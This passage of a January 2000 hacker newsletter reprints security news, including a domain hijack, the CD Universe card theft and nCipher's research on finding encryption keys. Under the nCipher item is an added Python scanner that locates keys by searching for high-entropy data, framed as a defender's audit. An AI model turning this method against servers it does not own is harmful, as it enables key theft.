R.O.T.C., that would enlist college computer science students to help the government fend off computer attacks by terrorists or foreign governments. 
But while the threat of cyber-terrorism has so far been more theoretical than actual, Reno's proposals are aimed at shoring up law enforcement's ability to combat everyday crime in the Information Age. The centerpiece of Reno's plan is decidedly low tech and relatively low cost because it involves no new computer systems or technical infrastructure. Rather, it calls for the creation of a network of specially trained computer crime coordinators at law enforcement agencies around the country. Designated coordinators would be available at a moment's notice and would be experts in the nuances of computer-related investigations. As an example, officials said such coordinators would be equipped to move quickly in serving court orders to obtain account information or request traces on calls or data transmission from local telecommunications companies and Internet service providers. That sort of coordination is increasingly commonplace in large metropolitan areas, such as Los Angeles, where the Police Department and other local agencies operate special high-tech crime units. But federal officials say smaller cities and agencies are far less likely to be equipped to assist in a computer investigation on short notice and often merely refer such requests for help to federal authorities. The second of Reno's proposals is more complicated, costly and uncertain. She is expected to call for a secure national computer system in which law enforcement agencies can both supply and access information on ongoing investigations of crimes ranging from hacking attacks to drug trafficking. The federal government has already created a network called the National Crime Information Center, which allows state and local authorities to tap federal crime databases. But that network does not allow state and local authorities to contribute information, and it has come under heavy criticism because it suffered numerous delays and cost millions of dollars more than initial estimates. 
The third major proposal expected from Reno involves the creation of jointly operated forensic computer crime labs around the country. Such labs would be staffed by computer experts trained in analyzing hard drives and other computer systems for digital evidence that is increasingly crucial in prosecuting white-collar crimes from hacking to health-care fraud. The FBI already operates such labs in most major metropolitan areas around the country. But officials said that those labs are overwhelmed by existing caseloads and that few state and local agencies have comparable facilities. Reno's proposal would replicate a unique arrangement in San Diego, where a forensic computer lab operates using personnel and resources from the FBI and the Secret Service as well as the San Diego District Attorney's Office and Police Department. Officials acknowledged that such a plan would require federal funding but declined to discuss how Reno planned to pay for the project except to say that is under consideration for the Justice Department's upcoming budget proposal. @HWA 86.0 Domains Redirected 01/11/00 ~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench The compromised password of an administrator at a New Jersey ISP, HighSpeedNet, allowed a malicious intruder to change the domain entries of several sites including Emory University, Exodus Communications, Colorado University, Corecomm and Dreamcast. Most sites restored service within a few hours. C|Net http://news.cnet.com/news/0-1005-200-1519750.html?tag=st.ne.1002.bgif?st.ne.fd.gif.j Widespread domain hack hits Emory University, others By Patricia Jacobus Staff Writer, CNET News.com January 11, 2000, 4:00 a.m. PT A hacker hijacked several Internet addresses over the weekend, confusing computer users and inconveniencing the organizations involved. All but two of the domain names, which were redirected to another company's Web site, were restored by yesterday afternoon. 
But some organizations, like Emory University in Atlanta, were still struggling to get their Web sites back in order, they said. Somehow, someone tapped into the universal registry operated by Network Solutions (NSI) and changed at least nine Net addresses redirecting users to the Web site of a New Jersey company called HighSpeedNet.net, said Jan Gleason, vice president of communications at Emory University. NSI representatives could not immediately be reached for comment. The operator of HighSpeedNet, a 19-year-old software technician, explained he was not the culprit, but a victim. "There's no reason for anyone to believe me," Ralph Hughes said in an interview yesterday afternoon. "But somebody got a hold of my password and authorized all these changes. There really wasn't anything I could do about it." This is the third time in a month that there have been major problems surrounding domain names. In late December, consumers complained that the universal software used to reserve Net names occasionally went on the blink, causing some people to lose out on a sought-after name. And last week, several registrars had to recall hundreds of domain names sold over the past few months with trailing or leading hyphens in the addresses. The hyphens were not allowable, but somehow NSI's registry accepted the domains anyway. Other companies affected by the hacker's weekend work included Exodus Communications, Colorado University, Corecomm and Dreamcast. Hughes said he first learned of the problem Saturday morning when he reported to work and checked his email. "There was a notice that all these domains were transferred to me," he said, somewhat exasperated. Shortly thereafter he discovered that the high traffic being redirected to HighSpeedNet was causing problems for his viewers, who couldn't get into chat rooms or click around the Web site. Hughes said he quickly called all the companies affected in an attempt to repair the problem. 
The universities had to wait until today to get help. NSI provides service for ".edu" domains only during the week. For Emory University, that meant faculty members and administrators couldn't use email, and prospective students weren't able to check out the school's site. "We're not in classes right now, so for us it was just a few minor headaches," Gleason said. "But we're told it's going to take until tomorrow to fix the problem, which has been going on for 60 hours now. On the Internet 60 hours is a lifetime." The incident has sparked a renewed interest by college advocates to demand better service for ".edu" domains. Universities don't pay a fee for the Internet addresses and in turn don't get seven-day-a-week service. Last year, a group called Educause, which represents college network administrators, vowed to jump into the Internet deregulation game, hoping to gain control of the names reserved for universities. Their efforts are still in the works. @HWA 87.0 Report on SuperComputer Sale to China Released 01/11/00 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench An Energy Department report on the sale of a decommissioned supercomputer (Intel Paragon XPS) by Sandia National Laboratories to a Chinese national has been released. The sale, in 1998, worried officials that the machine could end up in China. The machine was later repurchased for three times the original sale price. The report indicates that security was not compromised but does paint a disturbing picture of how sensitive equipment was handled at the lab. 
Washington Post http://www.washingtonpost.com/wp-srv/WPcap/2000-01/09/047r-010900-idx.html HNN Archive for August 2, 1999 http://www.hackernews.com/arch.html?080299 Defense Lab's Computer Sale Risked Security, Probe Finds By Bradley Graham Washington Post Staff Writer Sunday, January 9, 2000; Page A14 One of the nation's leading defense laboratories sold one of the world's 100 fastest computers at a bargain-basement price to a U.S. firm controlled by a Chinese citizen in late 1998. Ten months later, fearing that the supercomputer's parts could end up in China, lab officials hurriedly repurchased the machine at nearly three times the sale price. In a detailed report released last week, the Energy Department's inspector general faults officials at Sandia National Laboratories for ignoring risks to national security in the botched deal. While finding no evidence that security actually was damaged, the report paints a damning picture of the lab's handling of a piece of advanced technology used during the mid-1990s in highly classified nuclear weapons research. The new report concludes that the sale took place without the knowledge of senior lab and administration officials. Those involved in the deal treated the computer as just another item of surplus equipment, neglected to apply controls required for potential exports and failed to review operating manuals and data storage disks sent with the computer, the report says. Soon after the sale, the report reveals, lab officials dismissed suspicions voiced by the computer's manufacturer, Intel Corp., that the buyer might transfer some parts to China. Only when press reports last summer called attention to the sale and highlighted the buyer's Chinese citizenship did Sandia officials reclaim the computer. "We found the process used to sell the computer to be seriously flawed," said Gregory Friedman, the Energy Department's inspector general, in a summary of the 24-page report. 
"If the sale were done today, at a time we're sensitized to espionage, it would be an act of stupidity," responded Pace VanDevender, Sandia's chief spokesman, in a telephone interview. "But at the time, China was a friend, with 'most favored nation' status. And senior U.S. officials were visiting there, normalizing our relationship." Nevertheless, the episode has deeply embarrassed Sandia and compounded concerns about lax security at the national laboratories. News of the sale coincided in the past year with a congressional probe of China's alleged theft of U.S. nuclear secrets as well as criminal charges against Wen Ho Lee, a former physicist at Los Alamos National Laboratory who is accused of mishandling classified data. Sandia officials, while acknowledging some mistakes, insist that national security was never jeopardized by the round-trip journey of the Paragon XPS supercomputer from Sandia to a California warehouse and back again. They note that the machine was sold without its classified parts and would have been expensive and inefficient to operate. They also say the buyer had led them to believe he wanted to refurbish the computer and resell it to an Internet service provider in California. "He showed up in a flatbed truck to move the computer," VanDevender said. "This was consistent with his role as an entrepreneur looking to make a deal. Had he really been tasked by China to purchase the computer, he would have been instructed to handle it differently, since it's fragile and not something you bang around." But other government experts say the Paragon could have been reassembled and made operational again. Citing government and industry experts, the Energy Department report says it "could still be useful in a weapons program." "For the most part, Sandia treated the Paragon as if it were any other piece of excess property," the report says, "when in fact, it was a supercomputer that had been used in the department's nuclear weapons program." 
Sandia originally purchased the computer for $9.56 million in 1993 and used it to model nuclear weapons accidents and simulate the impact of nuclear shock waves on weapons components, among other functions. After five years, lab officials deemed the Paragon obsolete. By then, Sandia had purchased another supercomputer 15 times more powerful. Lab officials also were concerned about the older computer's reliability and were eager to avoid its estimated $3 million annual maintenance and operating costs.

Unable to interest any other U.S. government agencies in the system, Sandia sold it in September 1998 for $31,000 to EHI Group USA in Cupertino, Calif. A principal in the company, Korber Jiang, is a Chinese national, although Sandia officials say they were unaware of that at the time. A senior Energy Department official described EHI as a small business dealing in electronic products and other items and selling mostly to the local community.

Last July, Sandia bought the computer back from EHI for $89,000. Lab officials agreed to the higher price to allow Jiang "to preserve face with his joint-venture backers in China" and cover the cost of having stored the computer for 10 months, according to the report.

If restored to operation, the report says, the Paragon computer would be one of the 100 fastest in the world, with a capability of 190,000 million theoretical operations per second (MTOPS). At the time of the sale, Commerce Department regulations imposed export constraints on computers exceeding 2,000 MTOPS.

Nonetheless, Sandia officials never treated the computer as a potential national security risk. The lab's only risk assessment, the report says, consisted of Sandia's "property administrator" asking an unidentified lab employee in early 1998 whether another supercomputer was a "high-risk" item.

"The property administrator was told that the other supercomputer was not high-risk, but was export controlled due to its speed," the report says. "The property administrator said that he applied this information to the Paragon and determined that the Paragon was not a high-risk item."

Sandia officials also overlooked the shipment of 34 manuals and guides, which were buried beneath computer cables in boxes sent with the computer. And they neglected to screen 134 unclassified data storage disks.

"While there is currently no evidence that the 'unclassified disks' contained classified information relating to Sandia's classified operations of the Paragon," the report says, "Sandia did not know the exact nature of the information contained on the 'unclassified' disks at the time the Paragon was sold. In fact, no one at Sandia attempted to make the determination."

Grilled about the sale by a House Armed Services subcommittee last October, C. Paul Robinson, Sandia's director, said that had he known of Jiang's nationality, he would have sought to prevent the sale. But he said civil rights laws limit a seller's ability to refuse to deal with a legitimate U.S. firm on the basis of the citizenship of the firm's officers. He recommended new regulations banning the sale of export-controlled items to U.S. companies run by citizens of adversarial nations.

Since recovering the Paragon computer, Sandia officials say, the lab has revised its procedures for disposing of equipment and begun training employees to better identify sensitive sale items.

© Copyright 2000 The Washington Post Company

@HWA

88.0 Kevin Mitnick Interview 01/11/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Ryan

Kevin Mitnick is scheduled to give an interview to 60 Minutes reporters today. The interview should air on 60 Minutes on or about January 23, 2000. Kevin is scheduled to be released from Lompoc Prison on January 21st, 2000. It is felt that Kevin will discuss what he did, and the government's actions.
It is thought that since Kevin no longer has a trial hanging over his head he will be a little more revealing than in the past.

60 Minutes
http://www.cbs.com/now/section/0,1636,3415-311,00.shtml

(* Didn't see anything to do with Mitnick in this url? - Ed)

@HWA

89.0 Encryption Keys Easily Found On Systems 01/11/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by evenprime

Researchers at nCipher in Cambridge, England have found a way to easily find encryption keys on target systems. The technology centers on this: There is a general assumption that encryption keys will be impossible to find because they are buried in servers crowded with similar strings of code. What the researchers discovered, however, is that encryption keys are more random than other data stored in servers. To find the encryption key, one need only search for abnormally random data.

ZD Net
http://www.zdnet.com/intweek/stories/news/0,4164,2417628,00.html

Encryption Keys Vulnerable, Researchers Warn
By Doug Brown, Inter@ctive Week
January 5, 2000 5:38 PM ET

Researchers at an English company announced Wednesday that they found a way to pluck from Web servers "keys" that provide access to private data stored on servers, such as credit-card numbers.

The revelation that hackers can break into servers and steal encryption keys could have repercussions throughout the electronic commerce landscape. Companies have long struggled with ensuring customers' privacy in the face of increasing hacker ingenuity, but encryption keys were generally believed to dwell in a safe haven.

"It's a pretty big deal," said Tom Hopcroft, president of the Massachusetts Electronic Commerce Association. "Currently, people feel that their keys for credit-card numbers are pretty safe, because they are on a server with a lot of other data, where they might be hard to find."
In light of the discovery that encryption keys are readily open to attack, companies must find ways to prevent their discovery, Hopcroft added. "The loss of consumer confidence could cripple the phenomenal growth of electronic commerce," he said. "A lot of that [growth] is because we don't have a fear of giving out our credit-card numbers over the Internet." Alex Van Someren, president of nCipher in Cambridge, England, said the discovery of a method for retrieving encryption keys revolves around research conducted by his brother Nicko, chief technology officer and co-founder of nCipher, and Adi Shamir of the Weizmann Institute in Israel, co-inventor of the RSA encryption system, the base for much current encryption technology. The researchers published their initial findings at the Financial Cryptography '99 conference in February 1999. The research, Alex Van Someren said, laid a theoretical Now, he said, the researchers have demonstrated a concrete method for finding and stealing encryption keys from servers. The technology centers on this: There is a general assumption that encryption keys will be impossible to find because they are buried in servers crowded with similar strings of code. What the researchers discovered, however, is that encryption keys are more random than other data stored in servers. To find the encryption key, one need only search for abnormally random data. Hopcroft compared the method to classic Cold War tactics. "The United States developed quieter and quieter submarines, but they made them so quiet it was quieter than the ambient noise around them," he said. "So the Soviets could search for quiet spots." The problem could be particularly nettlesome for smaller companies, because many of them run their Web businesses on servers shared by other companies. 
All a hacker would have to do, Hopcroft said, is set up an account with an Internet service provider hosting a company's Web site, "go into that server and root around looking for the keys of other companies. With [the key] there is no way for me to be distinguished from a legitimate business owner." Van Someren said nCipher decided to go after encryption keys because "we make products that redress these problems." The company offers a hardware solution to the problem of encryption-key security. Van Someren noted that it's possible that others - hackers, in particular - already have discovered the path to the once-hidden encryption keys. "We haven't seen any evidence of real attacks occurring, but if it were to occur, there would not necessarily be any trace left behind that it had occurred," he said. Peter Neumann, a computer security researcher at SRI International in Menlo Park, Calif., said the discovery stands as just one more demonstration of "how flaky our infrastructure is." "Every operating system can be broken into one way or another, and the servers aren't an exception," he added. "We need a great deal more security than we have at the moment as we enter into electronic commerce. And the bottom line is we should be a little bit more cautious about depending upon cryptography as the answer to all of our problems, because it isn't. It's very difficult to embed it properly into a system." Bruce Schneier, a world-renowned cryptography expert and chief technology officer at Counterpane Internet Security in San Jose, echoed Neumann. "Security vulnerabilities are inevitable, because of the complexity of the product, the rush to market, all of these things," he said. "So the vulnerabilities, we see them every week. The only solution is to build security processes that take into account the fallibility of the products." Of the nCipher discovery, he said: "Let's say we fix this one. We're not magically better. We've fixed one little thing." 
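
Added example, not from the article or from nCipher: the search for abnormally random data described above, written in Python as a defender's audit for key material sitting unprotected in a server image or backup. The window size, step, threshold and the sample image are assumptions constructed for the illustration.

```python
import hashlib
import math
from collections import Counter

WINDOW = 64      # bytes examined at a time (assumed value)
STEP = 8         # distance the window slides (assumed value)
THRESHOLD = 5.2  # bits per byte; a 64-byte window tops out at log2(64) = 6.0


def shannon_entropy(chunk: bytes) -> float:
    """Shannon entropy of the byte values in chunk, in bits per byte."""
    if not chunk:
        return 0.0
    total = len(chunk)
    return -sum((n / total) * math.log2(n / total)
                for n in Counter(chunk).values())


def high_entropy_regions(data: bytes, window: int = WINDOW,
                         step: int = STEP, threshold: float = THRESHOLD):
    """Slide a window over data and return merged (start, end) byte ranges
    whose entropy is at or above the threshold."""
    regions = []
    last_start = max(len(data) - window, 0)
    for start in range(0, last_start + 1, step):
        if shannon_entropy(data[start:start + window]) < threshold:
            continue
        end = start + window
        if regions and start <= regions[-1][1]:
            # Overlaps or touches the previous hit: extend it.
            regions[-1] = (regions[-1][0], end)
        else:
            regions.append((start, end))
    return regions


def build_sample():
    """Constructed sample image: config-like text with 128 pseudo-random
    bytes in the middle standing in for a stored key (not a real key)."""
    line = b"ServerName shop.example.test\nDocumentRoot /var/www/html\n"
    filler = (line * 20)[:512]
    key = b"".join(hashlib.sha256(b"constructed-key-%d" % i).digest()
                   for i in range(4))
    return filler + key + filler, len(filler), len(key)


if __name__ == "__main__":
    image, key_off, key_len = build_sample()
    print(f"planted key bytes: {key_off}-{key_off + key_len}")
    for start, end in high_entropy_regions(image):
        chunk = image[start:end]
        print(f"high-entropy region {start}-{end} "
              f"({end - start} bytes, {shannon_entropy(chunk):.2f} bits/byte)")
```

Compressed or already-encrypted data scores just as high as a key, so each reported region needs review before it is treated as key material.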
@HWA

90.0 Buffer Overflow: Reform the AV Industry 01/11/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Render Man

How bad is the AV Industry? Does it need to be reformed? Does scanning for one piece of software because of the intent of the author and not the user make sense? How about scanning for legitimate security tools simply because they have extreme power when used by malicious people?

Buffer Overflow
http://www.hackernews.com/bufferoverflow/

Reform the A/V Industry!

Renderman, 01/13/00
Www.Hackcanada.com
RenderMan@Hackcanada.com

The year was 1988 and a young graduate student named Robert Morris Jr. released a self replicating program onto the internet to show off various holes in system security. Unfortunately when playing with fire, you can get burned. The program was supposed to only copy itself to a system once, but due to some errors in calculating the probable infection rate, the program replicated itself multiple times on each host on the network causing ever increasing system loads and eventual system crashes. This was the first internet panic over a "worm", but would not be the last.

In future years, the Michelangelo virus, Win95.CIH, and Melissa to name a few, spread fear rapidly across the net. Anti-Virus company media men following in hot pursuit of each.

It used to be easy for the Anti-Virus vendors. Anything that was self replicating and/or caused damage was a virus and must be hunted down and destroyed. It was easy, the enemy all wore the same uniform. Though some were snipers waiting for a specific target and a specific time. Other Viruses were experts at camouflage that could stay undetected for months in the wild before being flushed out, but they were all of the same army.

Now it's not so easy. If you look at the anti-virus industry today, they seem to be taking on the jobs of security cure all.
As Weld Pond mentioned in his Buffer Overflow article on 12/20/99, "The scanners are scanning for more and more software that does not contain virus or trojan code". This is becoming more epidemic.

Who remembers the case of Netbus? In February '99 Netbus released version 2.0 to the public as shareware. They removed many of the stealth features and changed its functionality so it was no longer a trojan horse but an actual product from an actual company. It even achieved a 5 cow rating on Tucows when released. Well, about a month later, the A/V industry started listing this new version of Netbus as a trojan, this action prompted Tucows to remove Netbus 2.0 even after it gave its 5 cow approval. Ultraaccess.net, the makers of Netbus, tried to talk to the A/V vendors after it was listed, most would not even return their phone calls. Panda was the only one to respond in any fashion to ultraaccess.net. Data Fellows and a few other vendors didn't list it until the big vendors and "customer response" prompted them to add it to their definitions. Ultraaccess.net is not a large company, they have however, hired a lawyer and are trying to get all their legal material together for their next version release sometime in spring next year, but it appears to be an up-hill battle. (Thanks go to Judd Spence at Ultraaccess for providing me with the history of Netbus.)

Another example of the A/V vendors' logic is L0phtcrack. L0phtcrack was released in 1997 and the latest version in January 1999. It has since become one of the premier tools for NT password auditing. L0phtcrack was recently listed as a trojan by one company then others started adding similar descriptions. A/V vendors follow each other on their latest listings, when one company lists a new piece of code, all the others just copy it, as was mentioned by Weld Pond on NTBugtraq (http://www.ntbugtraq.com/default.asp?pid=36&sid=1&A2=ind9912&L=ntbugtraq&F=&S=&P=5026).
So if one company doesn't like your product they can have it added to their definitions and all the other ducks fall into a row and list the same program blindly.

These situations sound like classic David vs. Goliath battles of the little developer being quashed by big business. With certain A/V producers also having remote administration products, does this not seem like a major conflict of interest? What is to keep them from listing the competition with muddy descriptions as virii and trojans to scare and annoy the customer into using their product?

In talking to various security scanner companies I kept hearing the same situation with Netbus; clients had bought and paid for it, but their A/V package was constantly deleting it. What sane person is going to disable their virus protection so they can run a program? Not a very good plan. This usually has the effect of forcing the person to change remote administration tools to one of the big names or to change A/V packages, but since all the vendors share definitions you're going to have the same problem. This can severely hurt small business with products like Netbus if their clients are getting frightened with virus warnings. Yet, equally featured products are never given a second glance.

If you feel your software was erroneously listed, there is very little recourse in trying to talk to the companies to have some action taken. The big vendors haven't returned Ultraaccess.net's phone calls and the smaller vendors follow the definitions of the big boys. So even if you successfully remove yourself from one package, one has to go to each vendor and plead your case all over again.

The A/V industry seems almost like a monopoly that can do what it wants and list anything with impunity, always falling back on the excuse of "customer demand" (though this is how many programs get on the list in the first place, but it's hard to verify if it's a legitimate response or a conjured up one).
It's gotten to the point where the industry can make or break products. With big companies like Symantec and NAI that have interests in other products of their own, I can't believe that they aren't abusing the public trust to leverage their own products in the marketplace. Again, as Weld Pond pointed out in his Buffer Overflow article "Symantec's Norton AntiVirus will scan for the remote control programs, NetBus or BO2K, but not the company's own PC Anywhere. Network Associates' McAfee VirusScan will detect the NT password auditing tool, L0phtCrack, but will not detect the company's own vulnerability auditing tool, Cybercop scanner, or their network sniffers, Sniffer Basic or Sniffer Pro". If this is not using your product to force another, I don't know what is.

The A/V industry is very necessary, but has gotten too complex for it to continue in the current state. In the very near future, any product that can be misused to any tiny degree will be listed, and what recourse will companies have to protect themselves from the abuses by the industry?

I propose an agency, commission, organization, board, watchdog group or something that all A/V vendors are a part of and follow the decisions of, so you only have to appeal your case to one group to clear your product's name. A sort of better business bureau for the industry. Many A/V vendors belong to various Internet Security Bodies but there is no body for Anti-Virus.

I also suggest a fourth category, separate from virus, worm or trojan. A category of just programs, that only alerts the user that a program is present that may *possibly* be abused in some fashion. Present the user with the option to find out more information about it or acknowledge that it is supposed to be there and never bug them about it again. Nothing scares a person more than seeing INFECTED! or TROJAN! applied to something on their computer.
A less frightening dialog that gives an advisory that says there is a program on their computer that could be a vulnerability would bring some sanity to this problem. Some companies already have a similar "exclude" feature but not all do and they still throw up scary warnings. For the IT community, the ability to filter definition files not to include programs that are supposed to be there would make their lives easier, rather than having their users freaking out at the Anti-Virus warnings.

I still feel it is important that if the A/V vendors insist on detecting anything and everything that may be a malicious tool that they don't play favorites, they should list EVERYTHING, including their own products. Many of us realize the merit of these fringe programs (most of which are free) and use them in place of big named box products but don't want to have to fight with our Anti-Virus packages to use them, and shouldn't have to.

People are demanding more and stranger things from their computers and sometimes it's necessary to borrow code from the book of virii and trojans to achieve this. The line has blurred between a nasty piece of code and a great product. Sometimes it's only the marketing that makes the difference.

Renderman, 01/13/00
Www.Hackcanada.com
RenderMan@Hackcanada.com

@HWA

91.0 China Registering Businesses to Monitor the Net 01/12/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench

Corporate Internet users in China's commercial hub of Shanghai have been told by Police to register their connections in a nationwide drive to increase control over the Web. "This is for safety," said an official of the Huangpu district branch of the Public Security Bureau. "In order to inspect the Internet, we must control it."
(I don't know whether to laugh or cry)

C|Net
http://news.cnet.com/news/0-1005-200-1518026.html?tag=st.ne.1002

China registering businesses to monitor Net
By Reuters
Special to CNET News.com
January 7, 2000, 11:10 a.m. PT

SHANGHAI--Police in China's commercial hub of Shanghai have told corporate Internet users to register in a nationwide drive to increase control over the Web.

The city's Public Security Bureau placed an advertisement in a local newspaper, and at least one district had issued a directive ordering companies using the Internet to register with police by Jan. 30, officials said today.

"This is for safety," said an official of the Huangpu district branch of the Public Security Bureau. "In order to inspect the Internet, we must control it."

China exercises strict control over the Internet, blocking Web sites it considers politically sensitive or pornographic.

Companies that fail to register could face fines of up to 50,000 yuan ($6,000), the official said. The police will charge no registration fee, and individual users are not required to follow suit, the official added.

The directive said registration would "strengthen the protection of safety of computers and information."

Companies and other "work units" are being required to complete two forms for police, giving email addresses and naming their Internet service providers, documents showed.

Internet use has shown explosive growth in China, with some estimates putting the number of Web surfers at more than 7 million by the end of last year. But the government has been alarmed by dissident groups and the banned spiritual movement Falun Gong using the Internet for communication and disseminating information.

Story Copyright © 2000 Reuters Limited. All rights reserved.
@HWA

92.0 CD Universe Thief Threatens to Post more CC Numbers 01/12/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench

Maxus, the thief who stole hundreds of thousands of credit card numbers from CD Universe is threatening to release more of the numbers on a new web site. The FBI is investigating.

ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2420863,00.html?chkpt=zdnntop

Data thief threatens to strike again

Computer intruder who tried to extort CD Universe says he'll release more stolen credit card numbers.

By Mike Brunker, MSNBC
January 11, 2000 3:49 PM PT

An e-mail author claiming to be the thief who released as many as 25,000 stolen credit card numbers earlier this month told NBC News he'll soon start distributing more card numbers on a new Web site.

"Maxus," aka "Maxim," claims to have stolen 300,000 credit card files from online music retailer CD Universe. The site he set up to hand out stolen card information was shut down over the weekend, but a writer identifying himself as the thief told NBC he'll open up a new site "soon."

In a separate note to MSNBC, the same writer hinted part of his motivation was to criticize e-commerce companies that don't do enough to preserve users' privacy.

The heist sent shockwaves through the e-commerce world over the weekend. The intruder, who claims to have plundered 300,000 credit card numbers from an Internet music retailer's computers, posted thousands of numbers on a Web page after failing to force the company to pay him $100,000.

The FBI is investigating the theft and attempted extortion, and the company, CD Universe, said it was advising customers that their credit card data could have been compromised.

Word of the extortion plot surfaced Friday, when the thief contacted a California computer security firm and directed employees to the Web site where he apparently had been posting the credit numbers since Christmas Day.
Asked why he thought CD Universe refused to pay him the $100,000, Maxus replied (sic), "They ... prefer money vs. people privacy." He also said he still has access to the CD Universe credit card database and can still glean credit card numbers from the site.

Brad Greenspan, chairman of eUniverse, the parent company of CD Universe, said Monday that company officials and an outside security firm it had hired were still attempting to determine how the thief had made off with the financial information. But he said there are reasons to believe that other online retailers also could be vulnerable.

Other sites could be vulnerable

"The hacker has said that there's a flaw (in the ICVerify software that CD Universe was using to process its transactions) ... in a general sense, not just that he found that flaw in our system," he told MSNBC.

Representatives of the software maker, CyberCash of Reston, Va., did not return calls Monday seeking comment.

The New York Times reported that the extortionist, a self-described 19-year-old from Russia using the name Maxim, claimed in e-mails that he used some of the credit card numbers to obtain money for himself.

On the Web site, which was shut down Saturday, the thief said e-mail and faxes had been sent to the company warning that he would publish the credit card numbers and other information obtained through an unspecified "security hole" in the company's e-commerce software.

"Pay me or I publish it," the thief claimed to have warned the Wallingford, Conn.-based company by e-mail and fax.

CD Universe and its parent, eUniverse, said they were working with the FBI to track the intruder.

Unauthorized purchases detailed

The company said it had not received any reports that customers' credit card numbers had been used to make unauthorized purchases.
But APBNews.com, an Internet publication focused on crime, said it obtained 32 credit card numbers before the Web site was removed and had verified at least two fraudulent purchases -- one for $1,000 worth of computer equipment and another for $1,250 worth of unspecified goods -- from the more than a dozen victims it was able to reach.

One of those charges occurred on Saturday, the day the extortionist's Web site was shut down and two weeks after he posted his first credit card numbers.

APBNews also reported that two of the cardholders said the card numbers that were posted on the site were replaced and canceled months ago, indicating the stolen database may have been old. Also, all of the credit cards were due to expire between February and April 2000, it said.

Customers contacted

Greenspan, the eUniverse chairman, said the company was in the process of contacting its customers and advising them of the theft.

"We're working with the credit card companies, and we will be and are in the process of informing our users and giving them the appropriate information so that they can make an informed decision (on whether to cancel the cards)," he said.

American Express Co. said Monday that its online fraud guarantee will protect its customers from responsibility for unauthorized online charges. In general, credit card holders are responsible for only up to $50 of any unauthorized charge.

And Sean Healy, a spokesman for VISA USA, said that while individual banks have the final say on the matter, in most cases there will be "no consumer liability" as a result of the theft.

And while the story received plenty of media attention after the New York Times ran it on the front page Monday, the publisher of a credit card industry newsletter said that the theft was essentially a "nonevent" that would likely not even rate a mention in the next edition.

"I've been following the industry for 35 years, and credit card fraud is at a historical low point (between 7 and 8 cents per $100)," said Spencer Nilson, whose Nilson Report is circulated in 80 countries. "There is no system that's ever been invented that doesn't cost more than the fraud costs to prevent it."

Elias Levy of SecurityFocus.com, a computer security firm that received e-mail from the "cracker" -- the term preferred by law-abiding computer hackers for those who put their skills to criminal use -- alerting it to the existence of the Web site, said approximately 25,000 of the stolen numbers were posted before the site was shut down.

Levy said the intruder claimed to have obtained the database containing the credit card numbers by using a security hole in ICVerify, the credit card processing application.

"He was not very clear on what the security problem was," Levy told MSNBC. "He claimed that he was able to use the ICVerify software to take a charge from one account and credit it to a different credit card -- basically doing a money transfer. But this is not the same thing as a hole being used to steal the credit cards in the first place."

First numbers posted on Christmas

In the e-mail he sent to the Times, the hacker said he sent a fax to the company last month offering to destroy his credit card files in exchange for $100,000. When he was rebuffed, he said, he began posting the numbers on another Web site, called Maxus Credit Card Pipeline, on Christmas Day.

The hacker e-mailed the Times the numbers for 198 credit cards as proof of the theft. The newspaper said it determined the numbers were real by contacting the credit card owners, at least one of whom also confirmed that she had used it to shop online at CD Universe.
Greenspan said company officials learned on Saturday that the numbers had been posted to the Web site and immediately contacted the FBI, which was able to get the Web site, which was hosted by a Kirkland, Wash., Internet service provider, to remove it.

Like many online retailers, CD Universe rode a burgeoning interest in online shopping at Christmas to bust open sales projections for music, movies, videos and games. CD Universe's sales were $9.1 million last year and are projected to rise to $16 million this year.

For the Internet as a whole, sales this past holiday season climbed more than 300 percent from the previous year to as much as $12 billion, above early expectations that sales would double.

Bob Sullivan contributed to this story.

@HWA

93.0 Army Plans on DMZs for Its Networks 01/12/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Sarge

The Network Security Improvement Program (NSIP) has mandated that all Army bases physically separate public servers from those providing access to private Army intranets. (This should be standard operating procedure, surprised it has taken this long to get done.)

Federal Computer Week
http://www.fcw.com/fcw/articles/web-dmz-01-12-00.asp

Army establishes Infowar "DMZ"
BY Bob Brewin
01/12/2000

The Army plans to establish network security demilitarized zones (DMZs) at all its bases worldwide as part of a plan to beef up its cyberdefenses against network intrusions and attacks.

The DMZs are planned under the Network Security Improvement Program (NSIP), which was designed by the office of the Army's director of information systems for command, control, communications and computers, which is headed by Lt. Gen. William Campbell.

Under NSIP, all Army bases and posts will have to physically separate public servers from those providing access to private Army intranets, according to an Army-wide message.
That message defined an information DMZ as "an electronic information area physically or logically separated from [the Army base] into which such systems are placed that have primary interface requirements with systems or users external [to the base]. The purpose of the DMZ is to provide a defined and controlled degree of access to information systems and services."

The NSIP message also stated that bases could establish multiple DMZs with varying degrees of security, depending on the amount of access internal Army information systems require to systems on public networks, such as the Internet, with all servers protected against known vulnerabilities associated with operating systems and hosted applications.

The message added that the Army eventually intends to establish a "more restrictive Army[-wide] DMZ," but did not provide any further details.

@HWA

94.0 CBS Alters On Air Images During News 01/12/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by janoVd

CBS News has admitted to using digital technology to alter images broadcast on their news programs The Early Show and 48 Hours. So the technology has only been used to insert large billboards or cover up competitors' advertising. A spokesperson for CBS said that each use of the technology is examined for impropriety. (Now we can no longer trust what we see on TV. How long before manufacturing video for news stories is common place?)

Nando Times
http://www.nandotimes.com/technology/story/body/0,1634,500153276-500188423-500797589-0,00.html

CBS News reportedly altering images to include network logos

Copyright © 2000 Nando Media
Copyright © 2000 Associated Press

